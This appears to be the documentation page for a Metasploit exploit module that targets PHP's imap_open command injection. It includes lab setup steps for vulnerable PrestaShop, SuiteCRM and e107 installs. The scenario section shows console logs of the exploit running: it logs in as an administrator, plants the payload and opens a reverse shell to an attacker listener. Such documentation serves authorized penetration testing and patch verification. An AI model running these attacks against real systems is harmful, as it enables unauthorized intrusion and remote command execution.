h00die
11 KiB
11 KiB
Vulnerable Application
The imap_open function within php,
if called without the /norsh flag, will attempt to preauthenticate an IMAP session.
On Debian based systems, including Ubuntu, rsh is mapped to the ssh binary. Ssh's
ProxyCommand option can be passed from imap_open to execute arbitrary commands.
While many custom applications may use imap_open, it is reported that the following
applications are vulnerable:
-
instantcms
-
HostCMS
-
e107_2
-
prestashop
-
SuiteCRM
-
SugarCRM
Prestashop exploitation requires the admin URI, and administrator credentials.
SuiteCRM exploitation requires administrator credentials.
Prestashop 1.7.2.4 on Ubuntu 16.04
Mostly derived from websiteforstudents.com, with a few tweeks for Ubuntu 16.04, and to install PHP's imap mod.
sudo apt install apache2
sudo sed -i "s/Options Indexes FollowSymLinks/Options FollowSymLinks/" /etc/apache2/apache2.conf
sudo systemctl stop apache2.service
sudo systemctl start apache2.service
sudo systemctl enable apache2.service
sudo apt-get install mariadb-server mariadb-client
sudo systemctl stop mysql.service
sudo systemctl start mysql.service
sudo systemctl enable mysql.service
sudo mysql_secure_installation
sudo systemctl restart mysql.service
sudo apt install php libapache2-mod-php php-common php-mbstring php-xmlrpc php-soap php-gd php-xml php-intl php-mysql php-cli php-mcrypt php-ldap php-zip php-curl php-imap
sudo phpenmod imap
sudo mysql -u root -p
CREATE USER 'prestashopuser'@'localhost' IDENTIFIED BY 'new_password_here';
GRANT ALL ON prestashop.* TO 'prestashopuser'@'localhost' IDENTIFIED BY 'user_password_here' WITH GRANT OPTION;
FLUSH PRIVILEGES;
EXIT;
cd /tmp && curl -O https://download.prestashop.com/download/releases/prestashop_1.7.2.4.zip
unzip prestashop_1.7.2.4.zip
sudo mkdir -p /var/www/html/prestashop
sudo unzip prestashop.zip -d /var/www/html/prestashop/
sudo chown -R www-data:www-data /var/www/html/prestashop/
sudo chmod -R 755 /var/www/html/prestashop/
sudo nano /etc/apache2/sites-available/prestashop.conf
Utilize the following configuration:
<VirtualHost *:80>
ServerAdmin admin@example.com
DocumentRoot /var/www/html/prestashop/
ServerName example.com
ServerAlias www.example.com
<Directory /var/www/html/prestashop/>
Options +FollowSymlinks
AllowOverride All
Require all granted
</Directory>
ErrorLog ${APACHE_LOG_DIR}/error.log
CustomLog ${APACHE_LOG_DIR}/access.log combined
</VirtualHost>
sudo a2ensite prestashop.conf
sudo a2enmod rewrite
sudo a2dissite 000-default
sudo systemctl restart apache2.service
Browse to the website, and install with default information.
sudo rm -rf /var/www/html/prestashop/install/
Now browse to /admin, and the first time you'll be redirected to the admin URI. If not, sudo ls /var/www/html/prestashop/admin*.
SuiteCRM 7.8.23 on Ubuntu 16.04
Mostly derived from vultr.com but adding php's zip and mbstring packages.
sudo apt-get install apache2 mariadb-server php7.0 php7.0-mysql php7.0-gd php7.0-curl php7.0-imap libapache2-mod-php7.0 php7.0-mcrypt php7.0-xml php7.0-json php7.0-mbstring php7.0-zip -y
sudo systemctl restart apache2
sudo phpenmod imap
sudo mysql_secure_installation
wget https://suitecrm.com/files/156/SuiteCRM-7.8/322/SuiteCRM-7.8.23.zip
unzip SuiteCRM-7.8.23.zip
sudo mv SuiteCRM-7.8.23 /var/www/html/suitecrm
sudo chown -R www-data:www-data /var/www/html/suitecrm
sudo chmod -R 777 /var/www/html/suitecrm
sudo nano /etc/apache2/sites-available/suitecrm.conf
Utilize the following configuration:
<VirtualHost *:80>
ServerAdmin admin@yourdomain.com
DocumentRoot /var/www/html/suitecrm/
ServerName yourdomain.com
ServerAlias www.yourdomain.com
<Directory /var/www/html/suitecrm/>
Options FollowSymLinks
AllowOverride All
</Directory>
ErrorLog /var/log/apache2/suitecrm-error_log
CustomLog /var/log/apache2/suitecrm-access_log common
</VirtualHost>
sudo a2ensite suitecrm
sudo a2dissite 000-default.conf
sudo systemctl restart apache2
sudo systemctl restart mysql
e107 2.1.9 on Ubuntu 16.04
Mostly derived from websiteforstudents.com, however with php 7.0 instead of 7.2.
sudo apt install apache2 mariadb-server mariadb-client php7.0 libapache2-mod-php7.0 php7.0-common php7.0-mysql php7.0-gmp php7.0-curl php7.0-intl php7.0-mbstring php7.0-xmlrpc php7.0-gd php7.0-bcmath php7.0-xml php7.0-cli php7.0-zip php7.0-imap -y
sudo systemctl restart apache2.service
sudo systemctl stop mysql.service
sudo systemctl start mysql.service
sudo systemctl enable mysql.service
sudo mysql_secure_installation
sudo mysql -u root -p
CREATE DATABASE e107;
CREATE USER 'e107user'@'localhost' IDENTIFIED BY 'new_password_here';
GRANT ALL ON e107.* TO 'e107user'@'localhost' IDENTIFIED BY 'new_password_here' WITH GRANT OPTION;
FLUSH PRIVILEGES;
EXIT;
cd /tmp
wget http://sourceforge.net/projects/e107/files/e107/e107%20v2.1.9/e107_2.1.9_full.zip
sudo unzip -d /var/www/html/e107 /tmp/e107_2.1.9_full.zip
sudo chown -R www-data:www-data /var/www/html/e107/
sudo chmod -R 755 /var/www/html/e107/
sudo nano /etc/apache2/sites-available/e107.conf
<VirtualHost *:80>
ServerAdmin admin@example.com
DocumentRoot /var/www/html/e107
ServerName example.com
ServerAlias www.example.com
<Directory /var/www/html/e107/>
Options FollowSymlinks
AllowOverride All
Require all granted
</Directory>
ErrorLog ${APACHE_LOG_DIR}/error.log
CustomLog ${APACHE_LOG_DIR}/access.log combined
<Directory /var/www/html/e107/>
RewriteEngine on
RewriteBase /
RewriteCond %{REQUEST_FILENAME} !-f
RewriteRule ^(.*) index.php [PT,L]
</Directory>
</VirtualHost>
sudo a2ensite e107.conf
sudo a2enmod rewrite
sudo a2dissite 000-default
sudo systemctl restart apache2.service
sudo systemctl restart mysql.server
sudo systemctl restart mysql.service
Verification Steps
- Install a vulnerable application
- Start msfconsole
- Do:
use exploit/linux/http/php_imap_open_rce - Do:
set TARGETURI [URI] - Do:
set USERNAME [username] - Do:
set PASSWORD [password] - Do:
set target [target] - Do:
run - You should get a shell.
Options
TARGETURI
The URI for the target. This may change by target. Default is .
Prestashop should be the admin URI, similar to /admin2769gx8k3.
Scenarios
PrestaShop 1.7.2.4 on Ubuntu 16.04.4 with PHP 7.0
resource (presta.rb)> use exploit/linux/http/php_imap_open_rce
resource (presta.rb)> set TARGETURI /admin2769gx8k3
TARGETURI => /admin2769gx8k3
resource (presta.rb)> set USERNAME ubuntu@none.com
USERNAME => ubuntu@none.com
resource (presta.rb)> set PASSWORD ubuntuubuntu
PASSWORD => ubuntuubuntu
resource (presta.rb)> set rhosts 1.1.1.1
rhosts => 1.1.1.1
resource (presta.rb)> set lhost 2.2.2.2
lhost => 2.2.2.2
resource (presta.rb)> set target 0
target => 0
resource (presta.rb)> set verbose true
verbose => true
resource (presta.rb)> exploit
[*] Started reverse TCP handler on 2.2.2.2:4444
[*] Redirected to http://1.1.1.1/admin2769gx8k3/
[*] Redirected to http://1.1.1.1/admin2769gx8k3/index.php?controller=AdminLogin&token=6dab1f7b4eea17d2b44a8929ead9df68
[*] Token: 6dab1f7b4eea17d2b44a8929ead9df68 and Login Redirect: http://1.1.1.1/admin2769gx8k3/&token=09283f9efc45fc75eca3b8d5f1b1f92f
[*] Logging in with ubuntu@none.com:ubuntuubuntu
[*] Login JSON Response: {"hasErrors":false,"redirect":"http:\/\/1.1.1.1\/admin2769gx8k3\/index.php?controller=AdminDashboard&token=e324e8b387afb1874947db9b1ba411c8"}
[+] Login Success, loading admin dashboard to pull tokens
[*] Customer Threads Token: ec653c8bfc09754fc63aaa94101911dc
[+] Sending Payload with Final Token: ec653c8bfc09754fc63aaa94101911dc
[*] IMAP server change left on server, manual revert required.
[*] Command shell session 1 opened (2.2.2.2:4444 -> 1.1.1.1:41964) at 2018-11-20 18:29:28 -0500
uname -a
Linux ubuntu1604 4.4.0-138-generic #164-Ubuntu SMP Tue Oct 2 17:16:02 UTC 2018 x86_64 x86_64 x86_64 GNU/Linux
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
SuiteCRM 7.8.23 on Ubuntu 16.04.4 with PHP 7.0
resource (suitecrm.rb)> use exploit/linux/http/php_imap_open_rce
resource (suitecrm.rb)> set target 1
target => 1
resource (suitecrm.rb)> set TARGETURI /
TARGETURI => /
resource (suitecrm.rb)> set USERNAME admin
USERNAME => admin
resource (suitecrm.rb)> set PASSWORD admin
PASSWORD => admin
resource (suitecrm.rb)> set rhosts 1.1.1.1
rhosts => 1.1.1.1
resource (suitecrm.rb)> set lhost 2.2.2.2
lhost => 2.2.2.2
resource (suitecrm.rb)> set verbose true
verbose => true
resource (suitecrm.rb)> exploit
[*] Started reverse TCP handler on 2.2.2.2:4444
[*] Loading login page
[*] Logging in as admin:admin
[+] Login Success
[*] Loading InboundEmail page
[+] Sending payload with group_id f047031d-1697-3d0d-bd39-5bf499e5470a
[*] IMAP server config left on server, manual removal required.
[*] Command shell session 1 opened (2.2.2.2:4444 -> 1.1.1.1:32806) at 2018-11-20 18:31:40 -0500
uname -a
Linux ubuntu1604 4.4.0-134-generic #160-Ubuntu SMP Wed Aug 15 14:58:00 UTC 2018 x86_64 x86_64 x86_64 GNU/Linux
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
e107 2.1.9 on Ubuntu 16.04.4 with PHP 7.0
resource (e107.rb)> use exploit/linux/http/php_imap_open_rce
resource (e107.rb)> set target 2
target => 2
resource (e107.rb)> set TARGETURI /
TARGETURI => /
resource (e107.rb)> set USERNAME admin
USERNAME => admin
resource (e107.rb)> set PASSWORD admin
PASSWORD => admin
resource (e107.rb)> set rhosts 1.1.1.1
rhosts => 1.1.1.1
resource (e107.rb)> set lhost 2.2.2.2
lhost => 2.2.2.2
resource (e107.rb)> set verbose true
verbose => true
resource (e107.rb)> exploit
[*] Started reverse TCP handler on 2.2.2.2:4444
[*] Logging in as admin:admin
[+] Login Success
[*] Checking if Cron is enabled for triggering
[+] Storing payload in mail settings
[*] Loading cron page to execute job manually
[+] Triggering manual run of mail bounce check cron to execute payload with cron id 3 and etoken 3b6aa8ca02dbd2bf8218874606c5e2f1
[*] IMAP server config left on server, manual removal required.
[*] Command shell session 1 opened (2.2.2.2:4444 -> 1.1.1.1:50742) at 2018-11-23 20:01:13 -0500
uname -a
Linux ubuntu1604 4.4.0-134-generic #160-Ubuntu SMP Wed Aug 15 14:58:00 UTC 2018 x86_64 x86_64 x86_64 GNU/Linux
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)